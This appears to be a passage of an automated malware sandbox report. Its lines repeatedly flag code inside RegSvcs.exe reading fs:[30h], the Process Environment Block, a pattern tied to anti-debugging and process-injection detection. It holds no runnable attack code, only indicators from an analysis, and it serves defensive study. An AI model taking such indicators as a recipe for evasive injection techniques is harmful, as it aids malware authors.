Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA30B mov eax, dword ptr fs:[00000030h]	5_2_019CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA30B mov eax, dword ptr fs:[00000030h]	5_2_019CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3437C mov eax, dword ptr fs:[00000030h]	5_2_01A3437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A12349 mov eax, dword ptr fs:[00000030h]	5_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A6634F mov eax, dword ptr fs:[00000030h]	5_2_01A6634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A38350 mov ecx, dword ptr fs:[00000030h]	5_2_01A38350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5A352 mov eax, dword ptr fs:[00000030h]	5_2_01A5A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov eax, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov eax, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov eax, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov ecx, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov eax, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1035C mov eax, dword ptr fs:[00000030h]	5_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov eax, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov ecx, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov eax, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov eax, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov eax, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A262A0 mov eax, dword ptr fs:[00000030h]	5_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE284 mov eax, dword ptr fs:[00000030h]	5_2_019CE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE284 mov eax, dword ptr fs:[00000030h]	5_2_019CE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A10283 mov eax, dword ptr fs:[00000030h]	5_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A10283 mov eax, dword ptr fs:[00000030h]	5_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A10283 mov eax, dword ptr fs:[00000030h]	5_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A02A0 mov eax, dword ptr fs:[00000030h]	5_2_019A02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A02A0 mov eax, dword ptr fs:[00000030h]	5_2_019A02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A662D6 mov eax, dword ptr fs:[00000030h]	5_2_01A662D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A02E1 mov eax, dword ptr fs:[00000030h]	5_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A02E1 mov eax, dword ptr fs:[00000030h]	5_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A02E1 mov eax, dword ptr fs:[00000030h]	5_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198823B mov eax, dword ptr fs:[00000030h]	5_2_0198823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996259 mov eax, dword ptr fs:[00000030h]	5_2_01996259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A250 mov eax, dword ptr fs:[00000030h]	5_2_0198A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274 mov eax, dword ptr fs:[00000030h]	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A18243 mov eax, dword ptr fs:[00000030h]	5_2_01A18243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A18243 mov ecx, dword ptr fs:[00000030h]	5_2_01A18243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198826B mov eax, dword ptr fs:[00000030h]	5_2_0198826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4A250 mov eax, dword ptr fs:[00000030h]	5_2_01A4A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4A250 mov eax, dword ptr fs:[00000030h]	5_2_01A4A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994260 mov eax, dword ptr fs:[00000030h]	5_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994260 mov eax, dword ptr fs:[00000030h]	5_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994260 mov eax, dword ptr fs:[00000030h]	5_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A6625D mov eax, dword ptr fs:[00000030h]	5_2_01A6625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE59C mov eax, dword ptr fs:[00000030h]	5_2_019CE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A105A7 mov eax, dword ptr fs:[00000030h]	5_2_01A105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A105A7 mov eax, dword ptr fs:[00000030h]	5_2_01A105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A105A7 mov eax, dword ptr fs:[00000030h]	5_2_01A105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C4588 mov eax, dword ptr fs:[00000030h]	5_2_019C4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01992582 mov eax, dword ptr fs:[00000030h]	5_2_01992582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01992582 mov ecx, dword ptr fs:[00000030h]	5_2_01992582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B45B1 mov eax, dword ptr fs:[00000030h]	5_2_019B45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B45B1 mov eax, dword ptr fs:[00000030h]	5_2_019B45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019965D0 mov eax, dword ptr fs:[00000030h]	5_2_019965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA5D0 mov eax, dword ptr fs:[00000030h]	5_2_019CA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA5D0 mov eax, dword ptr fs:[00000030h]	5_2_019CA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE5CF mov eax, dword ptr fs:[00000030h]	5_2_019CE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE5CF mov eax, dword ptr fs:[00000030h]	5_2_019CE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC5ED mov eax, dword ptr fs:[00000030h]	5_2_019CC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC5ED mov eax, dword ptr fs:[00000030h]	5_2_019CC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019925E0 mov eax, dword ptr fs:[00000030h]	5_2_019925E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	5_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26500 mov eax, dword ptr fs:[00000030h]	5_2_01A26500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE53E mov eax, dword ptr fs:[00000030h]	5_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE53E mov eax, dword ptr fs:[00000030h]	5_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE53E mov eax, dword ptr fs:[00000030h]	5_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE53E mov eax, dword ptr fs:[00000030h]	5_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE53E mov eax, dword ptr fs:[00000030h]	5_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64500 mov eax, dword ptr fs:[00000030h]	5_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535 mov eax, dword ptr fs:[00000030h]	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998550 mov eax, dword ptr fs:[00000030h]	5_2_01998550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998550 mov eax, dword ptr fs:[00000030h]	5_2_01998550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C656A mov eax, dword ptr fs:[00000030h]	5_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C656A mov eax, dword ptr fs:[00000030h]	5_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C656A mov eax, dword ptr fs:[00000030h]	5_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1A4B0 mov eax, dword ptr fs:[00000030h]	5_2_01A1A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C44B0 mov ecx, dword ptr fs:[00000030h]	5_2_019C44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019964AB mov eax, dword ptr fs:[00000030h]	5_2_019964AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4A49A mov eax, dword ptr fs:[00000030h]	5_2_01A4A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019904E5 mov ecx, dword ptr fs:[00000030h]	5_2_019904E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16420 mov eax, dword ptr fs:[00000030h]	5_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C8402 mov eax, dword ptr fs:[00000030h]	5_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C8402 mov eax, dword ptr fs:[00000030h]	5_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C8402 mov eax, dword ptr fs:[00000030h]	5_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E420 mov eax, dword ptr fs:[00000030h]	5_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E420 mov eax, dword ptr fs:[00000030h]	5_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E420 mov eax, dword ptr fs:[00000030h]	5_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198C427 mov eax, dword ptr fs:[00000030h]	5_2_0198C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B245A mov eax, dword ptr fs:[00000030h]	5_2_019B245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1C460 mov ecx, dword ptr fs:[00000030h]	5_2_01A1C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198645D mov eax, dword ptr fs:[00000030h]	5_2_0198645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE443 mov eax, dword ptr fs:[00000030h]	5_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BA470 mov eax, dword ptr fs:[00000030h]	5_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BA470 mov eax, dword ptr fs:[00000030h]	5_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BA470 mov eax, dword ptr fs:[00000030h]	5_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4A456 mov eax, dword ptr fs:[00000030h]	5_2_01A4A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A447A0 mov eax, dword ptr fs:[00000030h]	5_2_01A447A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3678E mov eax, dword ptr fs:[00000030h]	5_2_01A3678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019907AF mov eax, dword ptr fs:[00000030h]	5_2_019907AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1E7E1 mov eax, dword ptr fs:[00000030h]	5_2_01A1E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199C7C0 mov eax, dword ptr fs:[00000030h]	5_2_0199C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A107C3 mov eax, dword ptr fs:[00000030h]	5_2_01A107C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B27ED mov eax, dword ptr fs:[00000030h]	5_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B27ED mov eax, dword ptr fs:[00000030h]	5_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B27ED mov eax, dword ptr fs:[00000030h]	5_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990710 mov eax, dword ptr fs:[00000030h]	5_2_01990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C0710 mov eax, dword ptr fs:[00000030h]	5_2_019C0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0C730 mov eax, dword ptr fs:[00000030h]	5_2_01A0C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC700 mov eax, dword ptr fs:[00000030h]	5_2_019CC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C273C mov eax, dword ptr fs:[00000030h]	5_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C273C mov ecx, dword ptr fs:[00000030h]	5_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C273C mov eax, dword ptr fs:[00000030h]	5_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC720 mov eax, dword ptr fs:[00000030h]	5_2_019CC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC720 mov eax, dword ptr fs:[00000030h]	5_2_019CC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990750 mov eax, dword ptr fs:[00000030h]	5_2_01990750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2750 mov eax, dword ptr fs:[00000030h]	5_2_019D2750
